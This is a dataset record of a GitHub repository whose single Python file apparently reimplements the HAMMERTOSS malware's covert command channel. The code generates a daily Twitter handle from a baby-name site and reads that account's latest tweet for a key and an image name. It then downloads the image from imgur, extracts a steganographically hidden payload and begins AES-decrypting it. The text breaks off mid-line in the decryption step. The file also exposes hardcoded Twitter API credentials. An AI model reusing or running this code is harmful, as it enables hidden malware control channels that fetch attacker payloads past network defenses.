\"cstring\"\nusing namespace std;\nclass str\n{\n\tchar a[100];\n\tpublic:\n\t\tstr()\n\t\t{\n\t\t\tstrcpy(a,\"\");\n\t\t}\n\t\tstr(const char* b)\n\t\t{\n\t\t\tstrcpy(a,b);\n\t\t}\n\t\tstr operator + (str x)\n\t\t{\n\t\t\tstr temp;\n\t\t\tstrcat(a,x.a);\n\t\t\tstrcpy(temp.a,a);\n\t\t\treturn temp;\n\t\t}\n\t\tvoid show()\n\t\t{\n\t\t\tcout<<a;\n\t\t}\n};\nint main()\n{\n\t//char p[3]=\"def\";\n\t//char q[3]=\"abc\";\n\tstr a1(\"def\");\n\tstr a2(\"abc\");\n\tstr a3;\n\ta3=a1+a2;\n\ta3.show();\n\treturn 0;\n}" }, { "alpha_fraction": 0.5551839470863342, "alphanum_fraction": 0.571906328201294, "avg_line_length": 12.879518508911133, "blob_id": "2316ba60c94a959d9ea643e9d78d68e0844d289e", "content_id": "1b71bb35ea06d9a5758acd34be6788dc0cad5338", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 897, "license_type": "no_license", "max_line_length": 39, "num_lines": 66, "path": "/Virtual functions .cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass shape\n{\n\tdouble l,b;\n\tpublic:\n\t\tvoid get_data(double c, double d)\n\t\t{\n\t\t\tl=c;\n\t\t\tb=d;\n\t\t}\n\t\tdouble ret_l()\n\t\t{\n\t\t\treturn l;\n\t\t}\n\t\tdouble ret_b()\n\t\t{\n\t\t\treturn b;\n\t\t}\n\t\tvirtual void display_area()\n\t\t{\n\t\t\tcout<<\"No shape yet\";\n\t\t}\n};\nclass triangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\ttriangle(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=0.5*ret_b()*ret_l();\n\t\t\tcout<<\"triangle area: \"<<a<<endl;\n\t\t}\n};\nclass rectangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\trectangle(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=ret_b()*ret_l();\n\t\t\tcout<<\"rectangle's area: \"<<a<<endl;\n\t\t}\n};\nint main()\n{\n\tshape *sptr;\n\tshape s1;\n\ttriangle t1(4,5);\n\trectangle r1(4,5);\n\t//sptr=&s1;\n\t//sptr->get_data(4,5);\n\tsptr=&t1;\n\tsptr->display_area();\n\tsptr=&r1;\n\tsptr->display_area();\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6117256879806519, "alphanum_fraction": 0.6327433586120605, 
"avg_line_length": 13.836065292358398, "blob_id": "200a4609e5c697981487ab8240227858ac354e66", "content_id": "eba6ab5b69b3b20082c1b153eac7d300ec402bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 904, "license_type": "no_license", "max_line_length": 45, "num_lines": 61, "path": "/demo.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "import java.util.*;\n\nclass Person\n{\n\tprivate int id;\n\tprivate String name;\n\tvoid setdata(int a, String b)\n\t{\n\t\tid=a;\n\t\tname=b;\n\t}\n\tvoid showdata()\n\t{\n\t\tSystem.out.println(\"Id:\"+id+\" Name:\"+name);\n\t}\n};\nclass Employee extends Person\n{\n\tprivate int salary;\n\tvoid setsal(int a)\n\t{\n\t\tsalary=a;\n\t}\n\tvoid showsal()\n\t{\n\t\tshowdata();\n\t\tSystem.out.println(\"Salary:\"+salary);\n\t}\n};\nclass Manager extends Employee\n{\n\tprivate String desig;\n\tvoid setdes(String a)\n\t{\n\t\tdesig=a;\n\t}\n\tvoid showdes()\n\t{\n\t\tshowsal();\n\t\tSystem.out.println(\"Designation: \"+desig);\n\t}\n};\nclass demo\n{\n\tpublic static void main(String args[])\n\t{\n\t\tPerson p=new Person();\n\t\tp.setdata(101,\"Nabeel\");\n\t\tp.showdata();\n\t\tEmployee e=new Employee();\n\t\te.setdata(102,\"kritika\");\n\t\te.setsal(25000);\n\t\t//e.showdata();\n\t\te.showsal();\n\t\tManager m=new Manager();\n\t\tm.setdata(103,\"ABC\");\n\t\tm.setsal(12000);\n\t\tm.setdes(\"Vice President\");\n\t\tm.showdes();\n\t}\n};" }, { "alpha_fraction": 0.5583657622337341, "alphanum_fraction": 0.575875461101532, "avg_line_length": 13.714285850524902, "blob_id": "a140c908fca2d957f375fca2b55978dc32db09e2", "content_id": "81c75980a3978ea072e424f1513c75fcd635c0b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 514, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/stu2.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tvoid read();\n\t\tvoid print();\n};\nvoid student::read()\n{\t\n\tcin>>roll_no>>name>>marks;\n}\nvoid student::print()\n{\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint main()\n{\n\tstudent s[3];\n\tint i;\n\tfor(i=0;i<3;i++)\n\t{\n\t\tcout<<\"Enter rollno, name and marks for student \"<<i+1<<endl;\t\n\t\ts[i].read();\n\t}\n\tfor(i=0;i<3;i++)\n\t{\n\t\tcout<<\"Student\"<<i+1<<\"details: \\n\";\n\t\ts[i].print();\n\t}\n}" }, { "alpha_fraction": 0.5447009801864624, "alphanum_fraction": 0.5595026612281799, "avg_line_length": 14.63888931274414, "blob_id": "dc5a0de48b262b5919eac0d2dd5a6bc1c2943260", "content_id": "8fd01ff6415d72a7398826d9566ae7ef7f8b4ade", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1689, "license_type": "no_license", "max_line_length": 66, "num_lines": 108, "path": "/Inheritance example.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\n#include \"cmath\"\nusing namespace std;\nclass shape\n{\n\tdouble l,b,a;\n\tpublic:\n\t\tvoid get_data(double c, double d=0)\n\t\t{\n\t\t\tl=c;\n\t\t\tb=d;\n\t\t}\n\t\tdouble ret_l()\n\t\t{\n\t\t\treturn l;\n\t\t}\n\t\tdouble ret_b()\n\t\t{\n\t\t\treturn b;\n\t\t}\n\t\tvirtual void display_area()\n\t\t{\n\t\t\ta=ret_b()*ret_l();\n\t\t\tcout<<\"rectangle's area: \"<<a<<endl;\n\t\t}\n};\nclass triangle: public shape\n{\n\tdouble 
a;\n\tpublic:\n\t\tvoid get_data(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=0.5*ret_b()*ret_l();\n\t\t\tcout<<\"triangle area: \"<<a<<endl;\n\t\t}\n};\nclass rectangle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\tvoid get_data(double c, double d)\n\t\t{\n\t\t\tshape::get_data(c,d);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=ret_b()*ret_l();\n\t\t\tcout<<\"rectangle's area: \"<<a<<endl;\n\t\t}\n};\nclass circle: public shape\n{\n\tdouble a;\n\tpublic:\n\t\tvoid get_data(double c)\n\t\t{\n\t\t\tshape::get_data(c);\n\t\t}\n\t\tvoid display_area()\n\t\t{\n\t\t\ta=3.14*pow(ret_l(),2);\n\t\t\tcout<<\"Circle's area: \"<<a<<endl;\n\t\t}\n};\nint main()\n{\n\tshape *sptr;\n\tshape s1;\n\ttriangle t1;\n\trectangle r1;\n\tcircle c1;\n\tint c;\n\tdouble a,b;\n\twhile(true)\n\t{\n\t\tcout<<\"Enter your choice: \";\n\t\tcout<<\"1.for triangle\\n2.for rectangle\\n3.for circle\\n4.Exit\\n\";\n\t\tcin>>c;\n\t\tswitch(c)\n\t\t{\n\t\t\tcase 1: cout<<\"Enter base and height: \";\n\t\t\t\t\tcin>>a>>b;\n\t\t\t\t\tsptr=&t1;\n\t\t\t\t\tsptr->get_data(a,b);\n\t\t\t\t\tsptr->display_area();\n\t\t\t\t\tbreak;\n\t\t\tcase 2: cout<<\"Enter length and breadth: \";\n\t\t\t\t\tcin>>a>>b;\n\t\t\t\t\tsptr=&r1;\n\t\t\t\t\tsptr->get_data(a,b);\n\t\t\t\t\tsptr->display_area();\n\t\t\t\t\tbreak;\n\t\t\tcase 3: cout<<\"Enter radius: \";\n\t\t\t\t\tcin>>a;\n\t\t\t\t\tsptr=&c1;\n\t\t\t\t\tsptr->get_data(a);\n\t\t\t\t\tsptr->display_area();\n\t\t\t\t\tbreak;\n\t\t\tcase 4: return 0;\n\t\t\tdefault: cout<<\"Wrong choice\";\n\t\t}\n\t}\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5754985809326172, "alphanum_fraction": 0.5982906222343445, "avg_line_length": 21.677419662475586, "blob_id": "8a7e92b27e128f9503bdb1afe029da3252255566", "content_id": "da0260a9260d1c92bc97664e39e8fdd0b7659f1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 54, "num_lines": 31, "path": "/dhclient.py", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "def keygen():\n\timport random\n\tp,g=map(int,raw_input(\"Enter Public keys: \").split())\n\t#p=int(x[0])\n\t#g=int(x[1])\n\ta=random.randint(0,50)\n\tkey2=g**a%p\n\tprint \"Generated key: \",key2\n\tprint \"Private key: \",a\n\treturn str(key2),p,a\n\ndef seckey(msg,p,a):\n\tsk=int(msg)**a%p\n\tprint \"secret key: \",sk\n\treturn str(sk)\n\n\nimport socket\ncli=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nhost=socket.gethostbyname(\"\")\nport=9999\ncli.connect((host,port))\nprint \"--------------------------------------------\"\nprint \"\\t Connected to Server\\n\"\nk,p,a=keygen()\ncli.send(k)\nmsg=cli.recv(4096)\ncli.send(seckey(msg,p,a))\nprint \"\\n\\tDisconnected from Server\"\nprint \"--------------------------------------------\"\ncli.close()" }, { "alpha_fraction": 0.6135265827178955, "alphanum_fraction": 0.6236363649368286, "avg_line_length": 14.742856979370117, "blob_id": "6279a9b8e1f8d3e2580bd92a89ba68b00acbe34e", "content_id": "ac1d4923b2e7da2d78247c6225a54e0b82d0065a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 550, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/stu.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\n#include \"string\"\nusing namespace std;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tvoid read(int roll_no,char 
name[],float marks);\n\t\tvoid print();\n};\nvoid student::read(int r,char n[],float m)\n{\n\troll_no=r;\n\tstrcpy(name,n);\n\tmarks=m;\n}\nvoid student::print()\n{\n\tcout<<\"Student details: \\n\";\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint main()\n{\n\tstudent s;\n\tint r;\n\tchar n[20];\n\tfloat m;\n\tcout<<\"Enter rollno, name and marks\\n\";\n\tcin>>r>>n>>m;\n\ts.read(r,n,m);\n\ts.print();\n}" }, { "alpha_fraction": 0.6101882457733154, "alphanum_fraction": 0.643410861492157, "avg_line_length": 13.819672584533691, "blob_id": "790d8f77c6dc355914ac90981d5a0d28bdaeac8c", "content_id": "69dd496d06beafb586bcdc772210e53b44a5bd29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 903, "license_type": "no_license", "max_line_length": 59, "num_lines": 61, "path": "/intdem.java", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "interface Figure\n{\n\tvoid Area();\n}\nclass Rectangle implements Figure\n{\n\tdouble dim1,dim2;\n\tRectangle(double dim1,double dim2)\n\t{\n\t\tthis.dim1=dim1;\n\t\tthis.dim2=dim2;\n\t}\n\tpublic void Area()\n\t{\n\t\tSystem.out.println(\"Area of Rectangle: \"+(dim1*dim2));\n\t}\n}\nclass Triangle implements Figure\n{\n\tdouble dim1,dim2;\n\tTriangle(double dim1,double dim2)\n\t{\n\t\tthis.dim1=dim1;\n\t\tthis.dim2=dim2;\n\t}\n\tpublic void Area()\n\t{\n\t\tSystem.out.println(\"Area of Triangle: \"+(0.5*dim1*dim2));\n\t}\n}\nclass Circle implements Figure\n{\n\tdouble dim;\n\tCircle(double dim)\n\t{\n\t\tthis.dim=dim;\n\t}\n\tpublic void Area()\n\t{\n\t\tSystem.out.println(\"Area of Circle: \"+ 3.14*dim*dim);\n\t}\n}\nclass intdem\n{\n\tpublic static void main(String args[])\n\t{\n\t\tFigure f;\n\t\tRectangle r=new Rectangle(7,6);\n\t\tr.Area();\n\t\tTriangle t=new Triangle(5,3);\n\t\tCircle c=new Circle(2);\n\t\tc.Area();\n\t\tt.Area();\n\t\tf=r;\n\t\tf.Area();\n\t\tf=t;\n\t\tf.Area();\n\t\tf=c;\n\t\tf.Area();\n\t}\n}" }, { "alpha_fraction": 0.6135265827178955, "alphanum_fraction": 0.6183574795722961, "avg_line_length": 13.821428298950195, "blob_id": "93a8dd8f53437206e1342beaab7ecc76029749bb", "content_id": "b184001c55d81bd3d0cb653263ba01c3ab2356d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 414, "license_type": "no_license", "max_line_length": 68, "num_lines": 28, "path": "/stu1.cpp", "repo_name": "ankgitk/OOPlab", "src_encoding": "UTF-8", "text": "#include \"iostream\"\nusing namespace std;\nclass student\n{\n\tint roll_no;\n\tchar name[20];\n\tfloat marks;\n\n\tpublic:\n\t\tvoid read();\n\t\tvoid print();\n};\nvoid student::read()\n{\t\n\tcout<<\"Enter rollno, name and marks\\n\";\n\tcin>>roll_no>>name>>marks;\n}\nvoid student::print()\n{\n\tcout<<\"Student details: \\n\";\n\tcout<<\"Roll No:\"<<roll_no<<\"\tName:\"<<name<<\"\t\tMarks:\"<<marks<<endl;\n}\nint main()\n{\n\tstudent s;\n\ts.read();\n\ts.print();\n}" } ]
23
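The dhserv.py, dhclient.py and diffhell.py files in the row above all perform the same Diffie-Hellman exchange: each side picks a private exponent, publishes g^x mod p, and raises the other side's public value to its own exponent. A compact restatement of that arithmetic with toy numbers (p and g here are illustrative, not values from the repo), using Python's three-argument `pow` instead of the `g**b%p` form the lab files use:

```python
import random

p, g = 23, 5                       # public modulus and generator (toy values)
a = random.randint(1, p - 2)       # client's private key
b = random.randint(1, p - 2)       # server's private key

A = pow(g, a, p)                   # client publishes g^a mod p
B = pow(g, b, p)                   # server publishes g^b mod p

# both sides now derive the same shared secret g^(a*b) mod p
assert pow(B, a, p) == pow(A, b, p)
```

`pow(base, exp, mod)` reduces modulo p at every multiplication, so it stays fast even for large exponents, whereas `g**b` materializes the full power before the `%`.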
DKS1994/Apache-Spark-Movie-Recommendation-System
https://github.com/DKS1994/Apache-Spark-Movie-Recommendation-System
fbe4819db30653eb3025d1af69deef2a86f6cdbe
0d5807a6d37482efadc717d9433fc19788f8ae8a
a0edb050d20e9862e1e5df96d2bd1c0e5113e5d8
refs/heads/master
2021-01-10T17:57:51.073005
2016-01-28T18:13:05
2016-01-28T18:13:05
50,601,866
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6699965000152588, "alphanum_fraction": 0.7092577815055847, "avg_line_length": 16.141433715820312, "blob_id": "93d8bbac6a91fb03ddcbe676224f9f34d16ff9f9", "content_id": "ca551725c56cdbb9df4d6fe4ac55c8051392d44c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8609, "license_type": "no_license", "max_line_length": 179, "num_lines": 502, "path": "/Movies Recommender.py", "repo_name": "DKS1994/Apache-Spark-Movie-Recommendation-System", "src_encoding": "UTF-8", "text": "\n# coding: utf-8\n\n# In[5]:\n\nimport sys\nimport os\n\n\n# In[6]:\n\n#It is assumed that you have folder named 'data' which has another folder within it with name 'COMPTON' which contains ratings and movies files\n\n\n# In[7]:\n\nbaseDir = os.path.join('data')\ninputPath = os.path.join('COMPTON')\n\n\n# In[8]:\n\n#Ratings file conatins data in the form=> UserID::MovieID::Rating::TimeStamp\n\n\n# In[9]:\n\nratingsFileName=os.path.join(baseDir,inputPath,'mooc-ratings.dat')\n\n\n# In[10]:\n\n#Movies file contains data in the form=> MovieID::Title::Genres\n\n\n# In[11]:\n\nmoviesFileName=os.path.join(baseDir,inputPath,'mooc-movies.dat')\n\n\n# In[12]:\n\n#Building RDD from given files\n\n\n# In[13]:\n\nnumPartitions = 2\nrawRatings = sc.textFile(ratingsFileName).repartition(2)\nrawMovies = sc.textFile(moviesFileName)\n\n\n# In[14]:\n\n#get_ratings_tuple returns ratingsRDD in the form=>UserID::MovieID::Rating\n\n\n# In[15]:\n\ndef get_ratings_tuple(entry):\n items = entry.split('::')\n return int(items[0]),int(items[1]),float(items[2])\nratingsRDD = rawRatings.map(get_ratings_tuple).cache()\n\n\n# In[16]:\n\n#get_movies_tuple returns moviesRDD in the form=>MovieID::Title\n\n\n# In[17]:\n\ndef get_movies_tuple(entry):\n items = entry.split('::')\n return int(items[0]),items[1]\nmoviesRDD = rawMovies.map(get_movies_tuple).cache()\n\n\n# In[18]:\n\n#get_average_rating returns (MovieID,(number of ratings,average of rating tuple))\n\n\n# In[19]:\n\ndef get_average_rating(IDandRatingsTuple):\n countOfRatings = len(IDandRatingsTuple[1])\n averageOfRatings = float(sum(IDandRatingsTuple[1]))/countOfRatings\n return (IDandRatingsTuple[0],(countOfRatings,averageOfRatings))\n\n\n# In[20]:\n\n#movieIDsWithRatingsRDD consists of movieID and the tuple of all ratings assigned to it\n# movieIDsWithRatingsRDD has the form => (MovieID,(Rating1,Rating2,.....))\n\n\n# In[21]:\n\nmovieIDsWithRatingsRDD = ratingsRDD.map(lambda x : (x[1],x[2])).groupByKey()\n\n\n# In[22]:\n\nIDRatingsCountAndAverage = movieIDsWithRatingsRDD.map(get_average_rating)\n\n\n# In[26]:\n\n#movieNameWithAvgRatingsRDD has the form=>(average rating,Title,number of ratings)\n\n\n# In[29]:\n\nmovieNameWithAvgRatingsRDD = (moviesRDD\n .join(IDRatingsCountAndAverage).map(lambda x:(x[1][1][1],x[1][0],x[1][1][0])))\n\n\n# In[31]:\n\n#splitting ratingsRDD in 3 RDDs.\n\n\n# In[32]:\n\ntrainingRDD , validationRDD , testRDD = ratingsRDD.randomSplit([6,2,2],seed = 0L)\n\n\n# In[33]:\n\nimport math\n\n\n# In[35]:\n\n#compute_error computes Root Mean Square Error\n\n\n# In[36]:\n\ndef compute_error(predictedRDD,actualRDD):\n predictedRatings = predictedRDD.map(lambda (x,y,z):((x,y),z))\n actualRatings = actualRDD.map(lambda (x,y,z):((x,y),z))\n \n combinedRDD = (predictedRatings.join(actualRatings)).map(lambda (x,y):(y[0]-y[1])**2)\n count = combinedRDD.count()\n summation = combinedRDD.sum()\n \n return math.sqrt(float(summation)/count)\n \n\n\n# In[37]:\n\nfrom pyspark.mllib.recommendation import ALS\n\n\n# 
In[39]:\n\n#validationForPredictedRDD has the form=>(UserID,MovieID)\n\n\n# In[40]:\n\nvalidationForPredictedRDD = validationRDD.map(lambda (x,y,z):(x,y))\n\n\n# In[41]:\n\nseed =5L\niterations = 5\nregularizationParameter = 0.1\nranks = [4,8,12]\nerrors = [0,0,0]\nerr = 0\ntolerance = 0.02\n\nminError = float('inf')\nbestRank =-1\nbestIteration = -1\n\n\n# In[42]:\n\n#calculating bestRank for our training model out of given ranks [4,8,12]\n\n\n# In[43]:\n\nfor rank in ranks:\n    model = ALS.train(trainingRDD,rank,seed=seed,iterations=iterations,lambda_=regularizationParameter)\n    predicted_ratings = model.predictAll(validationForPredictedRDD)\n    \n    error = compute_error(predicted_ratings,validationRDD)\n    errors[err]=error\n    err += 1\n    if error < minError:\n        minError = error\n        bestRank = rank\n        \n    \n\n\n# In[ ]:\n\n#building best training model from bestRank obtained\n\n\n# In[49]:\n\nbestModel = ALS.train(trainingRDD,bestRank,seed=seed,iterations=iterations,lambda_=regularizationParameter)\n\n\n# In[50]:\n\n#building testForPredictingRDD for test error in prediction\n\n\n# In[51]:\n\ntestForPredictingRDD = testRDD.map(lambda (x,y,z):(x,y))\n\n\n# In[53]:\n\n#predicting ratings for testForPredictingRDD\n\n\n# In[54]:\n\nPredictingTestRDD = bestModel.predictAll(testForPredictingRDD)\n\n\n# In[56]:\n\n#Testing ERROR between the obtained ratings and the original RDD\n\n\n# In[57]:\n\ntestError = compute_error(PredictingTestRDD,testRDD)\n\n\n# In[58]:\n\nprint testError\n\n\n# In[59]:\n\n#For comparing our testError against the average rating for all movies in testRDD\n\n\n# In[60]:\n\ntestCount = testRDD.count()\ntestRDDratingsAvg = (float(testRDD.map(lambda (x,y,z):z).sum())/testCount)\n\n\n# In[61]:\n\ntestAvgRDD = testRDD.map(lambda (x,y,z):(x,y,testRDDratingsAvg))\n\n\n# In[62]:\n\ntestERR = compute_error(testAvgRDD,testRDD)\n\n\n# In[64]:\n\nprint testERR\n\n\n# In[65]:\n\n#Now predicting movies for a new user created by ourselves with userID myUserID equal to 0\n\n\n# In[93]:\n\nmyUserID = 0\n\n\n# In[94]:\n\n#Giving ratings to different movies by making an RDD with the same form as trainingRDD. \n#You can rate movies by adding tuple (userID,movieID,rating)\n#You can look for movie IDs from moviesRDD or directly from the movies.dat file. I leave this to you to figure out.\n\n\n# In[115]:\n\nmyRatedMovies = [\n     (myUserID,993,4),(myUserID,983,4.5),(myUserID,789,4),(myUserID,539,3),(myUserID,1438,5),(myUserID,1195,5),(myUserID,1088,4),(myUserID,651,3),(myUserID,551,2),(myUserID,662,5)\n     # The format of each line is (myUserID, movie ID, your rating)\n     # For example, to give the movie \"Star Wars: Episode IV - A New Hope (1977)\" a five rating, you would add the following line:\n     #   (myUserID, 260, 5),\n    ]\n\n\n# In[116]:\n\nmyRatedRDD = sc.parallelize(myRatedMovies)\n\n\n# In[117]:\n\n#The number of movies in our training set\n\n\n# In[118]:\n\nprint trainingRDD.count()\n\n\n# In[119]:\n\n#Adding our movies to trainingRDD\n\n\n# In[120]:\n\ntrainingSetWithMyRatings = trainingRDD.union(myRatedRDD)\n\n\n# In[121]:\n\n#The number of movies after adding to training set\n\n\n# In[122]:\n\nprint trainingSetWithMyRatings.count()\n\n\n# In[123]:\n\n#Building training model from our new training set RDD with bestRank calculated above\n\n\n# In[124]:\n\nmyRatingModel = ALS.train(trainingSetWithMyRatings,bestRank,seed=seed,iterations=iterations,lambda_=regularizationParameter)\n\n\n# In[125]:\n\n#Making predictions with our model on testRDD\n\n\n# In[126]:\n\nPredictionsOnTestRDD = myRatingModel.predictAll(testForPredictingRDD)\n\n\n# In[127]:\n\nprint PredictionsOnTestRDD.count()\n\n\n# In[128]:\n\n#Computing accuracy for our new model\n\n\n# In[129]:\n\naccuracyIs = compute_error(PredictionsOnTestRDD,testRDD)\n\n\n# In[130]:\n\nprint accuracyIs\n\n\n# In[131]:\n\n#Predicting our ratings for the movies we haven't rated yet\n#myRatedMoviesWithoutRatings has the form=>(UserID,MovieID)\n\n\n# In[132]:\n\nmyRatedMovies = sc.parallelize(myRatedMovies).map(lambda (x,y,z):(x,y))\n\n\n# In[133]:\n\nprint myRatedMovies.take(3)\n\n\n# In[135]:\n\n#Obtaining movies which we didn't rate in the form=>(UserID,MovieID)\n\n\n# In[136]:\n\nmyUnratedMovies = moviesRDD.map(lambda (x,y):(myUserID,x)).subtract(myRatedMovies)\n\n\n# In[137]:\n\nprint moviesRDD.count()\n\n\n# In[138]:\n\nprint myUnratedMovies.count()\n\n\n# In[140]:\n\n#Predicting ratings for movies we didn't rate by our model myRatingModel\n\n\n# In[141]:\n\npredictionsForUnratedMovies = myRatingModel.predictAll(myUnratedMovies)\n\n\n# In[143]:\n\n#PredictedRDD has the form=>(MovieID,predicted_Ratings)\n\n\n# In[144]:\n\npredictedRDD = predictionsForUnratedMovies.map(lambda (x,y,z):(y,z))\n\n\n# In[72]:\n\nprint IDRatingsCountAndAverage.take(3)\n\n\n# In[146]:\n\n#movieCounts has the form=>(MovieID,number_of_ratings)\n\n\n# In[147]:\n\nmovieCounts = IDRatingsCountAndAverage.map(lambda (x,y):(x,y[0]))\n\n\n# In[148]:\n\nprint movieCounts.take(3)\n\n\n# In[149]:\n\n#movieCountsWithPredictedRDD has the form=>(MovieID,(number_of_ratings,predicted_ratings))\n\n\n# In[150]:\n\nmovieCountsWithPredictedRDD = movieCounts.join(predictedRDD)\n\n\n# In[151]:\n\n#movieNameCountPredictedRatings has the form=>(MovieID,(Title,(number_of_ratings,predicted_ratings)))\n\n\n# In[152]:\n\nmovieNameCountPredictedRatings = moviesRDD.join(movieCountsWithPredictedRDD)\n\n\n# In[154]:\n\n#predictedRatingsWithName has the form=>(predicted_Ratings,Title,number_of_ratings)\n\n\n# In[155]:\n\npredictedRatingsWithName = movieNameCountPredictedRatings.map(lambda x:(x[1][1][1],x[1][0],x[1][1][0]))\n\n\n# In[158]:\n\n#For better recommendations we take movies which have more than 75 ratings by other users.\n\n\n# In[159]:\n\nrecommendedMoviesFromHighestRating = predictedRatingsWithName.filter(lambda x : x[2]>75)\n\n\n# In[160]:\n\n#Top ten recommended movies for ourselves!\n\n\n# In[163]:\n\nprint recommendedMoviesFromHighestRating.sortBy(lambda x:-x[0]).take(10)\n\n\n# In[ ]:\n\n\n\n" } ]
1
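The notebook in the record above calls a compute_error helper whose definition sits earlier in the file, outside this excerpt. As a reading aid only, here is a minimal RMSE-style sketch consistent with those call sites — the body is an assumption, not the repository's actual helper, and it presumes both RDDs hold (UserID, MovieID, rating) triples inside the notebook's PySpark session:

from math import sqrt

def compute_error(predicted_rdd, actual_rdd):
    # Key both RDDs by (UserID, MovieID) so matching ratings can be joined.
    predicted = predicted_rdd.map(lambda r: ((r[0], r[1]), r[2]))
    actual = actual_rdd.map(lambda r: ((r[0], r[1]), r[2]))
    # Square the per-pair rating differences, then average and take the root.
    squared = predicted.join(actual).map(lambda kv: (kv[1][0] - kv[1][1]) ** 2)
    return sqrt(squared.mean())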
popdogsec/Python-Hammertoss
https://github.com/popdogsec/Python-Hammertoss
7b97c40240146d58d009419ba9808c8d6939232c
c2906afc0b22b41a045b420022a1ac69a57d5ef8
3dde9119757bb78d717b8c73140e283e9f1021c3
refs/heads/master
2022-12-31T14:16:38.338924
2020-10-02T04:29:43
2020-10-02T04:29:43
300,312,963
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6024250388145447, "alphanum_fraction": 0.6167836785316467, "avg_line_length": 23.453125, "blob_id": "02c5eafd0018c52e43a1e923c843c941fe428b58", "content_id": "a07497493281e8a4af0789a2cb83f058b4a347a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3134, "license_type": "no_license", "max_line_length": 78, "num_lines": 128, "path": "/HAMMERTOSS.py", "repo_name": "popdogsec/Python-Hammertoss", "src_encoding": "UTF-8", "text": "import tweepy\nimport datetime\nfrom bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport urllib\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256\nfrom stegano import lsbset\nfrom stegano.lsbset import generators\nimport requests\n\ndef handle_generator():\n date_datetype = datetime.datetime.now()\n\n month = int(str(date_datetype)[5:7])\n day = int(str(date_datetype)[8:10])\n year = int(str(date_datetype)[0:4])\n\n position = (day + month)*3\n if position > 100:\n position = position - 100\n\n prestring = str(6*month) + str(3*day)\n\n poststring = str(int((2*year)/3))\n\n poslength = len(str(position))\n offset = poslength + 2\n\n page = urlopen('https://www.familyeducation.com/baby-names/top-names/boy')\n soup = BeautifulSoup(page, 'html.parser')\n\n for ul in soup.find_all('ul', class_='static-top-names part1'):\n line = ul.text\n\n start = line.find(str(position)+'.')\n\n if start < 0:\n for ul in soup.find_all('ul', class_='static-top-names part2'):\n line = ul.text\n\n start = line.find(str(position)+'.')\n\n start = start+offset\n end = line.find('\\n', start)\n name = (line[start:end])\n\n handle = prestring + name + poststring\n\n return handle\n\ndef twitter_checker(handle):\n conn = requests.head(\"https://twitter.com/\" + handle)\n\n if conn.status_code == 200:\n return True\n else:\n return False\n\ndef tweet_grabber(handle):\n auth = tweepy.AppAuthHandler('l6YWEnCAUpbymznvHL7n5sz7F', 'VpYDAkRmLw8x2zerOGqBdVIhlrPpHta9wIySaQxWLQ3Dkp6YmY')\n api = tweepy.API(auth)\n tweet = api.user_timeline(id=handle, count='1')\n for x in tweet:\n tweet_text = x.text\n return tweet_text\n\n\ndef parser(tweet):\n tweet = tweet + \" \"\n key = ''\n url = ''\n\n for i in range(0, len(tweet)):\n if tweet[i] == ' ':\n continue\n elif tweet[i - 1] == ' ' and tweet[i + 1] == ' ':\n url = url + tweet[i]\n else:\n key = key + tweet[i]\n\n return key, url\n\ndef image_fetcher(file_name):\n base_url = \"https://i.imgur.com/\"\n full_file_name = file_name + '.png'\n image_url = base_url + full_file_name\n urllib.request.urlretrieve(image_url, full_file_name)\n return\n\ndef decrypter(key, fileprefix):\n\n filename = fileprefix + \".png\"\n\n source = lsbset.reveal(filename, generators.eratosthenes())\n\n key = key.encode(\"ascii\")\n\n source = base64.b64decode(source.encode(\"latin-1\"))\n key = SHA256.new(key).digest()\n IV = source[:AES.block_size]\n decryptor = AES.new(key, AES.MODE_CBC, IV)\n data = 